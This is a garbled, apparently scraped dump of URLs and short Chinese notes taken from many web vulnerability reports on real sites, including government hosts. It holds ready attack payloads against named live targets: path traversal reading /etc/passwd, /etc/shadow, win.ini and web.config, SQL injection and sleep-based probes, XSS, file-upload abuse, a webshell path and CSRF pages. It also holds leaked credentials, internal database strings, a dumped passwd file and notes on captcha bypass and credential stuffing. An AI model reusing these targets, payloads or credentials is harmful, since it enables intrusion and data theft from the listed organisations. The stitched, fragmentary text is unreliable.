https://www.lt.lskjd.gov.cn/src/system/login.php https://124.93.200.109:8443/src/system/login.php https://218.26.24.146:8443/src/system/login.php https://211.142.24.77:8443/src/system/login.php https://124.93.200.108:8443/src/system/login.php https://124.93.200.100:8443/src/system/login.php https://110.249.216.198/src/system/login.php https://hbsrfb.gov.cn/src/system/login.php http://116.95.130.3/src/system/login.php https://222.74.54.234:8443/src/system/login.php https://222.74.54.234/src/system/login.php https://116.95.130.3:8443/src/system/login.php https://218.21.230.154:8443/src/system/login.php https://218.26.1.75:8443/src/system/login.php http://60.210.101.238/src/system/login.php https://211.142.29.10/src/system/login.php https://218.26.164.26/src/system/login.php https://www.yucoffee.com/src/system/login.php https://en.diyuan.cc/src/system/login.php https://restartclub.com/src/system/login.php https://58.22.6.39:8443/src/system/login.php https://218.26.4.186/src/system/login.php https://182.151.197.195/src/system/login.php https://220.193.65.237/src/system/login.php https://220.193.65.236/src/system/login.php https://220.193.65.238/src/system/login.php https://183.6.133.179/src/system/login.php https://220.166.83.98/src/system/login.php https://220.193.65.238:8443/src/system/login.php https://222.169.100.142/src/system/login.php https://182.151.197.195:8443/src/system/login.php https://218.56.144.171/src/system/login.php https://27.195.159.2/src/system/login.php https://218.56.144.172/src/system/login.php https://www.taaic.gov.cn/src/system/login.php https://220.193.65.234:8443/src/system/login.php https://www.gzzygts.com/src/system/login.php https://www.zyhsj.com/src/system/login.php https://58.22.6.40:8443/src/system/login.php https://218.26.168.72/src/system/login.php https://www.yczyzz.cn/src/system/login.php https://218.26.96.71:8443/src/system/login.php https://218.61.70.246:8443/src/system/login.php https://222.33.40.27:8443/src/system/login.php https://183.238.241.46:8443/src/system/login.php https://61.138.108.74:8443/src/system/login.php https://61.161.214.62/src/system/login.php https://125.32.94.203:8443/src/system/login.php http://**.**.**.**/admin.php?m=User&a=login http://**.**.**.**/Public/Uploads/baidu/20150820/1440059131746449.jpg/c.php http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://members.wingontravel.com/Password/ForgetPassword.aspx http://api.waimai.meituan.com/api/v6/user/address/getaddr?ci=10&utm_content=865165021528562&utm_medium=android&uuid=6E53E479BE4C390450FBC1B8E1551565E3930DF16989EF66449CE2FD577D5771&utm_term=30603&utm_campaign=AwaimaiBwaimai&utm_source=1046 http://api.waimai.meituan.com/api/v6/user/address/edit?ci=10&utm_content=865165021528562&utm_medium=android&uuid=6E53E479BE4C390450FBC1B8E1551565E3930DF16989EF66449CE2FD577D5771&utm_term=30603&utm_campaign=AwaimaiBwaimai&utm_source=1046 http://**.**.**.**/ http://cps.yaochufa.com/adefault/tuicode/markad?search_name=1&submit=%E6% http://cps.yaochufa.com/adefault/tuicode/mark?search_name=1&submit=%E6%90%9C%E7%B4%A2 http://cps.yaochufa.com/adefault/tuicode/markad?search_n http://jira.t3.com.cn:8081/secure/Signup!default.jspa http://wiki.t3.com.cn:8090/dashboard.action http://119.254.105.143/ticket/web/web.go?method=policyCal&showId=060671&seatIds=10210985&key=IF4F8DK1IFS891KF9S8FKFD8 http://119.254.105.172:7001/console/login/LoginForm.jsp http://drops.wooyun.org/tips/604 http://119.254.105.180/zabbix/ http://119.254.105.222/zabbix/ http://crm.125job.com/login http://crm.125job.com/smanager/list?user=a&name=&departmentid=&yt0=%E6%90%9C%E7%B4%A2 http://crm.125job.com/smanager/list?user=a&name=&departmentid=&yt0=%E6%90%9C%E7%B4%A2 http://chinamobileonline.hiall.com.cn/test.php http://116.228.55.12/ http://61.191.40.114/ http://218.18.104.132/ http://115.168.67.196/ http://219.143.125.111/ http://222.74.229.104/ http://219.148.199.8/ http://222.85.88.201/ http://219.148.23.14 http://eb.yaochufa.com/ycfad2014/public/login http://**.**.**.**/cx.asp http://**.**.**.**/cx.asp http://www.chinafoodsltd.com/ http://pos.99-pay.com/customer/operatorLogin.action http://pos.99-pay.com/customer/w.jsp http://fangvip.ganji.com/hr_v2/?c=Auth&a=login http://**.**.**.**/news/search.asp http://**.**.**.**/news/search.asp http://**.**.**.**/Read_News.asp?id=1121 http://**.**.**.**/Read_News.asp?id=1121 http://oa.glsc.com.cn:10040/glzqehr/df_login.do?method=checkLogin&userid=ReeMCd4ylOs%3D&encrypt=y http://oa.glsc.com.cn:10040/glzqehr/personBase.do?method=Df_openLicense&licenseName=c:\boot.ini http://product.cnfol.com/WebSite/ http://182.254.134.152:8080//loginUsers.action http://182.254.134.152:8080/loginOutUsers.action https://**.**.**.**/hsfzxjy/hf-spider http://**.**.**.**/homepage/urllinkset.jsp?topicid http://www.wsl0769.com/viewnews.php?newsid=203 http://admin.wsl0769.com/weixinpl/scene/index.php?customer_id=7024&obj_id=228 http://14.17.121.8/frontend/user.php http://mis.99.com/Default.aspx http://mis.99.com/Default.aspx http://oa.reocar.com:9090 http://runforfun.vanke.com/web/DownFile.aspx?Path=/web.config http://www.chuangjucf.com/index.php?user&q=action/reg&u=cmVnX2ludml0ZTIzNQ== http://www.chuangjucf.com/index.php?user&q=action/reg&u=cmVnX2ludml0ZTIzNSBhbmQgc2xlZXAoNSk= http://www.chuangjucf.com/index.php?user&q=action/reg&u= http://www.purenhong.com.cn http://www.purenhong.com.cn/admin/index.asp ip:211.151.70.240 username:admin password:admin http://wooyun.org/bugs/wooyun-2015-0124160 http://ttluniappserver.unicomlabs.com:8088/ServerCU/clientUpdate!askUpgrade.unicom http://www.hrxaey.com/do/jsarticle.php?fid=69&type=pic&rows=4&leng=22&iframeID=article_Pictopic http://**.**.**.**/ http://www.xiaoliangkou.com/passport/forget/ http://yun.lu http://bjtu.yun.lu/user/sendChgPwdEmail http://tsinghua.yun.lu/user/sendChgPwdEmail http://muc.yun.lu/user/sendChgPwdEmail http://bistu.yun.lu/user/sendChgPwdEmail http://whu.yun.lu/user/sendChgPwdEmail http://124.192.148.18:80/student/courses/searchCourses http://124.192.148.18:80/student/courses/searchCourses http://112.11.120.62/license!getExpireDateOfDays.action http://58.22.138.34/license!getExpireDateOfDays.action http://112.11.120.62:8080 http://221.2.154.142:8080 http://183.221.242.39:8080 http://123.127.75.182:8080 http://183.129.232.103:8080 http://42.202.133.35:8080 http://123.127.75.181:8080 http://112.11.120.62:8088 http://219.138.141.252:8088 http://218.205.123.2:8088 http://183.246.161.141:8088 http://218.205.127.17:8088 http://117.40.91.101:8088 http://119.7.222.196:8088 http://58.42.241.49:8088 http://221.2.40.236:8088 http://222.38.248.60:8088 http://183.221.242.39:8088 http://123.127.75.182:8088 http://183.129.232.103:8088 http://123.127.75.181:8088 http://42.202.133.35:8088 http://112.11.120.29/preview.php http://112.11.120.34/Web/login http://**.**.**.**/,是中国教育和科研计算机网的一个资源库吧 http://**.**.**.**/director.php?action=click&siteid=505&url=http://**.**.**.**/ http://oa.xiaolajiao.com:8080/seeyon/ http://**.**.**.**/ http://open.huawei.com:8081/data/ http://open.huawei.com:8081/source/ http://61.191.47.110/skyworth/admin/admin_login.php http://ichtf.dbw.cn/online/web.php?id=31230 http://ichtf.dbw.cn/ltd/product/product.php?id=4408 http://ichtf.dbw.cn/615cx/cxxt/product.php?id=4578 https://**.**.**.**/register/register_new01.jsp https://**.**.**.**/findloginpwd/findloginpwd1.jsp http://i.kuwo.cn/US/login.htm?status=4这个接口额,可以看到这个接口的登陆位置是有验证码限制的,但是这个验证码可以绕过,只要输入正确一次抓包之后,就会一直正确 http://m.yichao.cn/login.aspx http://**.**.**.**:8080/pages/lecture.aspx?action=more&id=912 http://**.**.**.**:8080/pages/lecture.aspx?action=more&id=912 http://**.**.**.**:8080/pages/lecture.aspx?action=more&id=912 http://**.**.**.**/phpMyAdmin/ http://**.**.**.**/getCrowdfundingDemand.do http://www.newegg.cn/Ajax/FeedBack/AjaxPostReview.aspx t.im/rlo9”在点击网址安装程序后手机立即开始疯狂给通讯录内人员发送该短信。机主立即将手机关机送修。拿到手机了解情况后,二话不说,卸掉手机卡。开始对手机进行检查。找到一款名为微投票的APK。十分可疑。安装时间为1个小时前,正是机主中毒时间。该程序权限有(接受短信,读取联系人数据,写入联系人数据,修改SD卡内容,读取设备状态和身份,发送短信)GG就是他了。(这是在我自己手机安装的,原来的手机修好后还给他了) http://yun.lu/user/securityAuth/sendBindEmail https://github.com/ladykiller/project-workspace/blob/044ec3e3f8d528a4a776cb2f3d1c05a5ba9fb534/workspace-develop/com.fitweber.workdaily/build/classes/mail.properties http://**.**.**.**/fczs/xwxq.jsp?id=1 http://**.**.**.**/wzht/FCKeditor/editor/fckdialog.html http://www.sinoflt.com/swpx/indexNews_zxjj.action?newsType.tag=%E4%B8%AD%E5%BF%83%E7%AE%80%E4%BB%8B www.jobs.uestc.edu.cn http://www.jobs.uestc.edu.cn/login.action http://**.**.**.**/bugs/wooyun-2015-0130569 http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://www.jlsygj.gov.cn/ http://119.254.116.131/jmx-console/ http://www.cmstop.cn/),然后访问用户功能 http://site.cmstop.cn/#/member/index/index?state=enable http://testlink.bj.oupeng.com/login.php http://cms.ku6.com:8080/ http://cms.ku6.com:8080/channel_config/getChannelHomeVideoList.jsp?cid=3 http://cms.ku6.com:8080/login/login.html http://api.resume.hiall.com.cn//.git/config http://61.130.247.180:9504/tyyd_cp/index.action http://ybapi.doyouhike.net/user/show?auth=612a2f689cb25bf78e0070cbd3c284b4&userID=1 http://narya.puahome.com:30551/user_profile/info?user_id=99 http://wooyun.org/bugs/wooyun-2015-0125115 http://wechat.youku.com:80/ http://**.**.**.**/ http://flux.shop.letv.com/fluxWebRf/login.jAct?userLanguage=zh_CN https://www.douban.com/service/auth2/auth?client_id=08710dbc5a7ae51c195329350f70af54&redirect_uri=http%3A%2F%2Fwww.zenlifestore.com%2Flogin%2Fgetloginfordouban&response_type=code dealer.auto.ifeng.com/dealerback/login http://woa.unicomgd.com/moa.htm https://pcmoa.chinaunicom.cn https://pcmoa.chinaunicom.cn http://woa.unicomgd.com/moa.htm http://**.**.**.**:8001/netapply/reg.action存在命令执行漏洞 http://mycommunity.haier.com.my/home/submitform_quize http://site.cmstop.cn/link/index/list?type=1&offset=0&limit=50&_=1440172313381&sort=desc&category=2 https://112.65.177.221/por/login_psw.csp?rnd=0.19368067595075716 https://112.65.177.221/por/login_psw.csp?rnd=0.19368067595075716 https://112.65.177.221/por/login_psw.csp?rnd=0.19368067595075716 http://hunb.nea.gov.cn http://hdj.nea.gov.cn/index_more2.jsp?typeid=416 http://hunb.nea.gov.cn/action/front/indexAction_queryTopContentByColumn?column.columnId=Col_ywdd&contentPage.curPageNo=1&contentPage.pageSize=20&searchTitle=1%27%22%28%29%26%25%3Cw%3E%3CScRiPt%20%3Ealert%28/wooyun/%29%3C/ScRiPt%3E http://hunb.nea.gov.cn/SCSERC_COMMON/preViewDoc.action PS:/SCSERC_COMMON/preViewDoc.action url:http://**.**.**.**/,产品如下 http://int.api.juhe.cn/.git/config http://webdisk.api.juhe.cn/.git/config http://local.api.juhe.cn/.git/config http://autoconfig.api.juhe.cn/.git/config http://autodiscover.api.juhe.cn/.git/config http://**.**.**.**/detail.php?id=62970 http://**.**.**.**/ http://**.**.**.**/feedback/ http://oa.womaiapp.com/seeyon/index.jsp http://oa.womaiapp.com/seeyon//logs/ctp.log http://oa.womaiapp.com/seeyon//logs/uc.log http://**.**.**.**:80/asklist.asp http://**.**.**.**/ http://oa.ctrl.189.cn/web/login.do https://www.zuoyoufy.com/login http://218.76.215.26:81/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini http://113.204.112.229/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini http://124.133.249.67:81/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini http://222.128.125.139:81/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini http://60.211.244.146:81/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini http://210.22.52.135:81/ http://58.240.210.122:81/ http://180.166.221.122:81/ http://218.75.205.128:81/ http://**.**.**.**/ErrReport.asp?SpecialID=148 http://**.**.**.**/play1/ListenUrls.asp?id=&name=qq107959 http://**.**.**.**/Singer.asp?http://**.**.**.**/Singer.asp?Classid=1&SClassid=&Nclassid=273 http://**.**.**/dylgy/Login.aspx http://**.**.**.**/site/list?cat_id=32 http://**.**.**.**/site/list?cat_id=32 http://**.**.**.**/site/list?cat_id=32 https://github.com/lxn91618/server-gitdepot/blob/401fb4bbe6b7afc82f98e0d6b066b8736538bea1/9AirSMS/zj/mail/SendMail.java http://yun.haodai.com http://dealer.auto.ifeng.com/manageback/login http://219.143.252.247:8083/ws_member.asmx?op=CheckMember http://219.143.252.247:8030/ws_member.asmx?op=CheckCallUser http://joycitycrmws2.cofco.com:8086/ http://www.iana.org/assignments/cont-disp/cont-disp.xhtml#cont-disp-1 http://survey.pptv.com/admin http://career.sdebank.com/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.InfoReleaseAction&method=createBBSRelease&TreeSelectedID=&TableSelectedID= http://career.sdebank.com/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.login.LoginAction http://career.sdebank.com/iufotempfile/of9y4z8574x0iyshzjir0r966glinc/utl_webshell_150248.jsp http://charge.bydauto.com.cn/ http://charge.bydauto.com.cn/charge/Service.asmx http://charge.bydauto.com.cn/charge/Service.asmx http://tempuri.org/GetPilesByPage2 xmlns:i="http://www.w3.org/1999/XMLSchema-instance xmlns:d="http://www.w3.org/1999/XMLSchema xmlns:c="http://schemas.xmlsoap.org/soap/encoding/ xmlns:v="http://schemas.xmlsoap.org/soap/envelope/ http://tempuri.org/ http://vip.cofco.com:8081/ http://vip.cofco.com:8081/12.zip https://**.**.**.**/winner/xbzq/index.html https://**.**.**.**/invoker/EJBInvokerServlet https://**.**.**.**/invoker/JMXInvokerServlet http://ekp.joyu.com http://m.mail.sohu.com/entry这个是搜狐闪电邮箱移动版的登陆位置,登陆位置没有验证码限制 http://iac.hit.edu.cn/moreNews.asp?NewsID=130&BigClassID=6&SmallClassID=10 http://iac.hit.edu.cn/peopleinfo.asp?id=%D6%DC%D3%F1 http://iac.hit.edu.cn/admin/index.asp http://**.**.**.**/ http://**.**.**.**/web/ http://**.**.**.**/info.aspx http://**.**.**.**/pay/index.html http://**.**.**.**/Main.aspx http://**.**.**.**/portal/itsmlogin http://**.**.**.**/homeLogin.action http://**.**.**.**:8991/F/BXFIG1K7LJRTQEA2U2AHN9URJ8UAI1N221C1MC135PF4K2XEEJ-07348?func=file&file_name=login-session http://woxin.jxict.cn/jstorm-ui/cluster.jsf http://woxin.jxict.cn/jstorm-ui/log.jsf?clusterName=&host=10.180.117.12&port=7621&parent=.&log=../../../../../../../../../../etc/shadow http://woxin.jxict.cn/woxin-admin/query/exportClientRecommendStatistic.do http://schoolhouse.bjedu.gov.cn/schoolhouse/login.jsp http://video1.dynns.cnuninet.com/manager/login.cfm http://**.**.**.**/Account/Login.aspx http://**.**.**.**/bugs/wooyun-2010-0105249 http://**.**.**.**/bugs/wooyun-2010-0105249 http://**.**.**.**/survey/login.aspx http://**.**.**.**/adm/InfoDetails.aspx?id=48 http://schoolhouse.ec.js.edu.cn/schoolhouse/login.jsp bbs.360safe.com/adminop.php http://yuyin.baidu.com/,貌似基本没有对输出进行过滤,各种储存型xss。 www.scti.cn http://www.scti.cn http://mensao.app.yaolan.com/Test http://**.**.**.**/xinli/TeaShow.aspx?TypeNo=47&teaNo=7 http://m.onlylady.com/ http://m.onlylady.com:80/ http://58.32.246.78:8380/ http://58.32.246.78:8380/jmx-console/ http://**.**.**.**/noticespic/da20142019102046.jsp http://**.**.**.**/bugs/wooyun-2010-096354 http://**.**.**.**/WebGroup.aspx?tpid=0&classid=85&groupid=59 http://crm.189.cn/ltePortal/ http://report.chunshuitang.com http://mingjia.zhiyin.cn/uc_server/admin.php shell:http://mingjia.zhiyin.cn/uc_server/c1.php http://t5.flygps.com.cn/ http://t5.flygps.com.cn/userfile/userinfo/1903585/face.aspx http://myadmin.zol.com/index.php?c=Merchant_MerchantManage&a=Default&firstMenuId=0&permitId=3 index.php/Information/detail/id/232*.html?PHPSESSID=a24bd821bddd1ef845db868446b14e71 http://www.oeeee.com奥一网主站登陆框接口,未做登陆验证限制 http://fenxiao.lvmama.com:80/ http://43.250.15.233/manager/html http://43.250.15.234/manager/html http://amway.social-touch.com http://yangguangfeilun.social-touch.com http://newbi.social-touch.com http://pro.social-touch.com http://wechat.social-touch.com http://srp.social-touch.com http://**.**.**.**/interplugin/fdinfo/search.jsp?tableId=14 index.php/Index/content_zh/id/1220*/link/rcpy http://**.**.**.**:80/index.php/Index/content_zh/id/1220 http://110.249.218.73:9080/hotelbs164/default.aspx http://121.22.40.178:8090/hotelbs/default.aspx http://121.22.40.204:8090/hotelbs/Login.aspx http://219.140.161.86:8080/ http://**.**.**.**/zscsxt/bmgl/XsbmwhBmbPrint.action?tableID=4001 http://pic.ci123.com/?types=2 inurl:http://www.epicc.com.cn/EbsWeb/CARDSAVE.do http://www.epicc.com.cn/EbsWeb/CARDSAVE.do?UIAction=showResult&orderId=0a94ad0c441479ad425fed51439884f0 http://www.epicc.com.cn/EbsWeb/CARDSAVE.do?UIAction=showResult&orderId=476d2506f5de21d30a79cf560408b67e http://www.teachina.com/editor/xheditor/src/xheditor-zh.aspx http://222.211.79.137:9080/security/authen http://123.57.205.35:7001/jmxroot/warning.jsp jdbc:oracle:thin:@10.51.66.87:1521:orcl http://ad.henan.sina.com.cn/acer2010/js/vote_js.php?p_id=1 http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/web_joblist.aspx?CompID=20150531211633218 http://**.**.**.**/web_company.aspx?CompID=20150531211633218 http://**.**.**.**/login_jobpanduan.aspx?UserName= http://ilife.homelink.com.cn/aigou/index.php?c=index&a=detail_pic&id=10469%27%20and%20%271%27=%271 http://ilife.homelink.com.cn/aigou/index.php?c=index&a=detail_pic&id=10469%27%20and%20%271%27=%272 http://amway.social-touch.com/admin/login,抓到一个get请求 http://amway.social-touch.com/admin/userInfo,发送get请求,duang,只有管理用户才可以看到的用户敏感数据全被我们看光了,而且里面所有连接全部有效,可以尽情愉快地玩耍了 http://**.**.**.**/s/getSelect.action?param=0存在注入漏洞,参数param http://123.125.116.123/../../../etc/passwd http://123.125.116.123/../../../etc/hosts http://220.181.2.41/../../../etc/passwd http://pt17.aimererp.com/ http://180.166.221.122:81/ http://i.28.com/index.php http://**.**.**.**/action/front/indexAction_prepareIndex http://**.**.**.**/action/front/investigateAction_updateInvestigate(POST) http://**.**.**.**/action/front/indexAction_initUploadedFile?uniqueURL=../../../../../../../../../../etc/passwd%00.jpg http://oa.social-touch.com/index.php?controller=login&action=index&1=noCookie&2=%E8%AF%B7%E9%87%8D%E6%96%B0%E7%99%BB%E5%BD%95 http://**.**.**.**/portal/HomePage!search.do http://db1.xiaozufan.cn/.svn/entries http://db3.xiaozufan.cn/.svn/entries http://db1.xiaozufan.cn/wss https://github.com/Shoukichi/WorkFiles http://211.91.224.232/mms/ jdbc:oracle:thin:@192.168.103.10:1521:mmsdb http://211.91.224.232:8081/mcp/cxf/services http://211.91.224.232:8080/cms http://211.91.224.244/resources http://211.91.224.244:9009/services/VacSync http://211.91.224.244:9007 http://211.91.224.244:9008 http://211.91.224.244:8161/admin user:openstack user:openstack user:openstack http://122.13.0.18:8080/ user:admin passwd:qz***cS_1 http://211.91.224.232/m***/ http://211.91.224.232/c***/ http://211.91.224.232/mob***/ http://211.91.224.232/reso***/ MMS-STATIC-ASSETS:http://211.91.224.230:8080/static_***ts/ http://122.13.0.56/svn/repos/ http://www.xin.com:80/ajax/top_load/ http://wechat.youku.com/login/index http://events.oppo.com/2015/r7placerace/.git/config http://events.oppo.com/oppoxantm/.DS_Store http://events.oppo.com/index.zip http://**.**.**.**:81/userlogin.aspx,用户名sql注入 http://123.103.13.151/ http://**.**.**.**/dcms/bms/login.jsp http://www.ssports.com/view/resetpwd.shtml?val=18600001111 http://**.**.**.**/Jygy/home/id/274.htm http://oa.tianya.cn//resin-doc/examples/security-basic/viewfile?file=index.jsp http://oa.tianya.cn//resin-doc/examples/security-basic/viewfile?file=WEB-INF/password.xml http://www.hswzyj.com/shop/mobile/hdzqde.php?id=160 http://www.hswzyj.com/shop/mobile/hdzqde.php?id=160 http://office.mingyi.com.cn/ http://myph.mingyi.com.cn/control.aspx http://cbs.cninsure.net/logon/Login.jsp http://www.miicaa.com:10001/console http://121.40.30.228/console http://www.net.cn/ https://**.**.**.**/solemichael/omni/blob/ca0e78da05f44909917b13a2841d4c1d0fa50c08/src/main/java/org/omni/remote/email/impl/TextEmailSender.java http://www.pigai.org/用户跟管理员都可以登陆的接口。 http://tc.homelink.com.cn/Superagent/Superagent00.aspx http://tc.homelink.com.cn/Superagent/Reports02.aspx?UniqNo=373 http://tc.homelink.com.cn/Superagent/Reports02.aspx?UniqNo=373 http://www.camera360.com/用户登录可撞库 https://cloud.camera360.com/third/otherUser/otherLogin?jsonpCallback=jQuery1706136869133915752_1440297967198&username=wi-67@163%2ecom&password=737d4d5bac083df74a8cc171b462f397&sname=login&vcode=&rememberMe=0&_=1440298835423 http://update.ma43.163.com/login_cbt.list更新服务器列表 http://106.2.39.147:8011/ http://106.2.39.147:8011/conf/config.inc http://www.ahgyjt.com.cn/ http://61.191.18.251:8080/oa/windex.jsp http://www.gogo.cn/daily/user/login http://bbs.icalew.com/login.asp http://lm.meilishuo.com/ http://mall.gtja.com/) https://one.gtja.com) http://mall.gtja.com/zt/hlwjr/CVS/Root http://mall.gtja.com/zt/hlwjr/CVS/Entries https://one.gtja.com/yht/CVS/Root https://one.gtja.com/yht/CVS/Entries pserver:huangjinxin@10.176.64.121:/GTJACVS index.jsp/1.1/Thu favicon.ico/1.1/Mon index.jsp/1.6/Tue interfaceMonitor.jsp/1.1/Mon ssoWeb.html/1.1/Mon test.jsp/1.1/Mon pserver:huolong@cvs.cssweb.sh.cn:/cvs_2010/project/gtja www.cqpds.com http://ascforex.com/zh-cn/read.jsp?id=1,如图所示: http://ascforex.com/zh-cn/read.jsp?id=11,如图所示: success:true,message:'上传成功',data:{src:'/upfile/images/2015-8/2323431.aspx'},total:1,errors http://ascforex.com//upfile/images/2015-8/2323431.aspx,如图所示: ip:27.223.70.24 http://www.360jjcg.com/ http://**.**.**.**/fckeditor//editor/filemanager/connectors/test.html http://**.**.**.**/fckeditor//editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/1.asp&NewFolderName=x.asp http://dsp.donews.com www.cnzz.com http://admin.sgst.cn/htzh/user.do?act=login http://119.254.70.128这个站测试下字典的,就在以前的漏洞中找了几个用户名,还真有不少弱口令。Wooyun搜索了一下这个站,以前爆过漏洞,看到以前注入、上传等各种问题,手贱测试了下,上传没成功,手工没注入时,返回是下面的样子,看来是都修复了啊。 http://www.podinns.com/ http://**.**.**.**/ http://**.**.**.**/**.**.**.**mon.php?action=modelquote&cid=2&name=members http://mys8.super8.com.cn:81/Login.aspx http://**.**.**.**/ http://ee403.hit.edu.cn/database.rar http://**.**.**.**/jmx-console/ http://staff.cntv.cn/ http://59.108.36.117:8000/WebResource.axd?d=1440148493可能存在oracle http://116.236.205.179/ids/admin/main.jsp test:111111 http://space.show.sina.com.cn/video_on.php?space_uid=233110&videoid=1182 http://game.feng.com/game/infoDetail/2015-05-05/index.php?r=gamenew/infoDetail/getFavoriteInfo http://yimin.edai.com/manager/ http://**.**.**.**/jsp/zc2_form2_step2.jsp?userName=admin1&flzx=null https://www.gzekt.com/payServlet www.gzekt.com https://www.gzekt.com http://my.zhinei.com//space.php?do=news&name=1&type=1&page=1 www.zuk.com root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin saslauth:x:499:76:"Saslauthd saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin www:x:500:502::/home/www:/bin/bash zabbix:x:501:503::/home/zabbix:/bin/bash http://creative.pptv.com/share/detail?id=49 http://train.tcl.com.cn/DRP/ http://train.tcl.com.cn/DRP/login.action http://wsb.tcl.com/isp/login.aspx http://wsb.tcl.com/isp/vstwebfao/basesetting/PersonEdit.aspx?email=bolm%40tcl.com&type=gr http://www.wandonganxin.cn/ImgList.aspx?fcol=005 http://221.228.208.230/ http://121.40.30.228/console site:www.99bill.com http://**.**.**.** http://**.**.**.**/login.html http://top.gaoloumi.com/citylist.php?id=57 easy.huawei.com/www.rar http://61.183.121.210:1979/ http://61.183.121.210:1979 http://system.greentree.com.cn:8080/frontinvest/roomdetail.aspx?hotelcode=531001 http://system.greentree.com.cn:8080/frontinvest/roomdetail.aspx http://zuchebang.net:8087/ http://www.niuyw.com/index.php?m=Home&c=Download&a=archive&id=13 http://softcoreonline.huawei.com/app/front/faq!list.action http://softcoreonline.huawei.com/front/faq!list.action http://softcoreonline.huawei.com/app/front/app!checkMobile.action?appIds=402880823c1e6e77013c1e7710e50001,402880e43c0b3094013c0b31465b0001,402880823c1e6e77013c1e79016a0003,402880e53c0df5db013c0df743310001&applyInfo.mobile=-1 site:img.58cdn.com.cn,然后得到大量合同信息 http://**.**.**.**/bugs/wooyun-2015-0116307 http://**.**.**.**/ http://zz.yiban.cn/ajax/comm_ajax.php?action=default_skin http://t.jztbox64.test.58v5.cn/weixingame/wt/manageMeijiaActivitiesPage http://mrp5.7daysinn.cn/pur802a.web/forms/formorderprint.aspx?unityno=&chainid=376 http://mrp5.7daysinn.cn/pur802a.web/forms/formorderprint.aspx?unityno=&chainid=376 http://mrp5.7daysinn.cn/pur802a.web/forms/formorderprint.aspx?unityno=&chainid=377 http://mrp5.7daysinn.cn/pur802a.web/forms/formorderprint.aspx?unityno=&chainid=378 http://www.21cake.com/member-save_setting.html http://xss.gift/21cakecsrf.html https://119.233.188.79/por/login_psw.csp?rnd=0.6216886338753285 http://192.168.94.1/login.aspx http://211.151.20.241/ http://211.151.20.241/online1.4.01/android/SrvVersion.xml http://211.151.20.241/OpenBeta1.3.02/android/SrvVersion.xml http://emobile.weaver.com.cn/customerproduce.do?serverVersion=NC45# http://oa.open.com.cn/tableApply/tableApplySelect http://oa.open.com.cn/user/useraddresslist http://ec.sinopec.com/supp/index.shtml http://ec.sinopec.com/ready/order1.html http://ec.sinopec.com/ready/workflow.html http://ec.sinopec.com/1%E6%90%9C%E7%B4%A2%E5%8A%9F%E8%83%BD%E4%BC%98%E5%8C%96.html http://ec.sinopec.com/supp/lianxi.xlsx ec.sinopec.com/supp/wuzhileibie.docx http://**.**.**.**:7072/login.aspx http://m.21cake.com/passport-lost.html http://www.yaofang.cn/a/user/Update_Profile http://xss.gift/yaofangcsrf.html http://www.open.com.cn/tools/submit_ajax.ashx?action=profile_edit http://xss.gift/opencsrf.html http://**.**.**.**/bugs/wooyun-2015-0121611 http://www.tclcomm.cn/news_content.asp?articleid=2114 http://**.**.**.**/querycontent.action http://**.**.**.**/downAction.action?fileName=index.jsp&higher_id=4 http://**.**.**.**/downAction.action?fileName=WEB-INF/web.xml&higher_id=4 inurl:getOrderSuccedDetail http://www.kugou.com/shop/order/getOrderSuccedDetail?order_no=201508140945452297080 http://www.kugou.com/shop/order/getOrderSuccedDetail?order_no=201508141221579120694 http://www.kugou.com/shop/order/getOrderSuccedDetail?order_no=201508141019479944252 http://**.**.**.**/ http://shenzhen.haodai.com/xindai/admindetail?id=12892 http://**.**.**.**/zpxxview.php?newsid=707 http://**.**.**.**/zpxxview.php?newsid=707 http://**.**.**.**/zpxxview.php?newsid=707 http://www.speedcn.net/news/NewsList.php?Host=,36,48 http://222.179.234.145/guestbook/list/portalId/86/cid/828 http://hxhgsyzx.yznu.cn//guestbook/list/portalId/86/cid/828 http://aexp.zjsru.edu.cn/guestbook/list/portalId/662/cid/6903 http://etc.cqmu.edu.cn/guestbook/list/portalId/33/cid/586 http://physics.lab.scu.edu.cn/guestbook/list/cid/3681 http://hxss.lab.scu.edu.cn/guestbook/list/portalId/262/cid/2016 http://211.151.62.140/Web%20References/ www.bjxd2sc.com,访问一下: http://110.249.218.73:9080/hotelbs164/Login.aspx 